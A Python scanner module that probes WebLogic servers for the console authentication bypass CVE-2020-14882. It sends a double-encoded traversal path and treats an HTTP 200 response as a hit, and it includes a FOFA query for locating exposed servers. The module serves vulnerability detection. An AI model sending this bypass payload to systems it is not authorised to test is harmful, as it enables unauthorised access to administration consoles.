# coding:utf-8
import requests
import urllib
import re
# Silence urllib3 warnings for the whole process: c2Func sends its request with
# verify=False (no TLS certificate validation), which would otherwise emit an
# InsecureRequestWarning on every HTTPS call.
requests.packages.urllib3.disable_warnings()

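class c2Class(object):
    """Status-code check for the WebLogic console authentication bypass (CVE-2020-14882).

    ``c2Func`` sends one unauthenticated GET for ``vulpath`` to the target and
    reports a hit when the response status equals ``flag``.  The response body
    is not inspected, so a hit is an indicator to confirm by hand, not proof:
    any server that answers 200 for that path (a catch-all page, or a login
    page reached through a redirect, which requests follows by default)
    matches as well.
    """

    # Optional URL scheme at the very start of a target string.
    _SCHEME_RE = re.compile(r'([A-Za-z][A-Za-z0-9+.\-]*)://')

    def __init__(self):
        # Descriptive metadata about the issue. Apart from vulname, nothing in
        # this file reads these; presumably the surrounding scan framework does.
        self.vulname = 'weblogic authencation bypass(CVE-2020-14882)'
        self.cveid = 'CVE-2020-14882'
        self.vulsystem = 'weblogic'
        self.vulversion = '10.3.6.0; 12.1.3.0; 12.2.1.3; 12.2.1.4; 14.1.1.0'
        self.findtime = '2020-10'
        self.fofa = 'app="BEA-WebLogic-Server" || app="Weblogic_interface_7001"'
        self.refer = 'https://blog.csdn.net/weixin_41598660/article/details/109409965'
        self.bbb = '未授权访问'  # category label; the text means "unauthorized access"
        self.testisok = True

        # Request headers sent with the probe.
        self.headers = {'User-Agent': 'Mozilla/5.0'}

        # Path requested on the target, and the HTTP status treated as a match.
        self.vulpath = '/console/css/%252e%252e%2fconsole.portal'
        self.flag = 200

    @classmethod
    def _base_url(cls, target):
        """Reduce *target* to ``scheme://authority``; return None if unusable.

        Path, query and fragment are dropped so that the probe path is always
        appended directly to the authority.  Without this, a target such as
        ``http://host?x=1`` would push the probe path into the query string and
        the request would hit ``/`` instead, where a 200 is a false positive.
        """
        target = target.strip()
        scheme_match = cls._SCHEME_RE.match(target)
        if scheme_match:
            scheme = scheme_match.group(1).lower()
            rest = target[scheme_match.end():]
        else:
            # No scheme given: assume plain HTTP, as the original code did.
            scheme, rest = 'http', target
        if scheme not in ('http', 'https'):
            return None
        authority = re.split(r'[/?#]', rest, maxsplit=1)[0]
        if not authority:
            return None
        return '%s://%s' % (scheme, authority)

    def c2Func(self, target):
        """Probe *target* once and report whether the status code matches.

        Args:
            target: Host, ``host:port`` or ``http(s)://`` URL.  Only the scheme
                and authority are used; path, query and fragment are dropped.
                ``http://`` is assumed when no scheme is given.

        Returns:
            ``(status, returnData)``.  ``status`` is 1 when the response status
            equals ``self.flag`` and 0 otherwise.  ``returnData`` is the finding
            text on a match, the error text when the target is unusable or the
            request raised, and ``''`` when the server answered with any other
            status.
        """
        status = 0
        returnData = ''
        base = self._base_url(target)
        if base is None:
            return status, 'invalid target: %r' % (target,)
        url = base + self.vulpath
        try:
            # verify=False: certificate validation is off, so the answer is not
            # authenticated as coming from the intended host.
            resp = requests.get(url=url, headers=self.headers, verify=False, timeout=5)
            # Status-only comparison; the body is never examined.
            if resp.status_code == self.flag:
                returnData = '%s is vuln(%s), vulpath:%s' % (base, self.vulname, url)
                status = 1
        except Exception as e:
            # Best-effort by design: any failure (DNS, timeout, TLS, ...) is
            # reported as text with status 0 instead of propagating.
            returnData = str(e)
        return status, returnData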

if __name__ == '__main__':
    # Manual run against one hard-coded private-range address; prints the
    # (status, returnData) tuple returned by the check.
    lab_url = 'http://192.168.199.137:7001/'
    checker = c2Class()
    outcome = checker.c2Func(lab_url)
    print(outcome)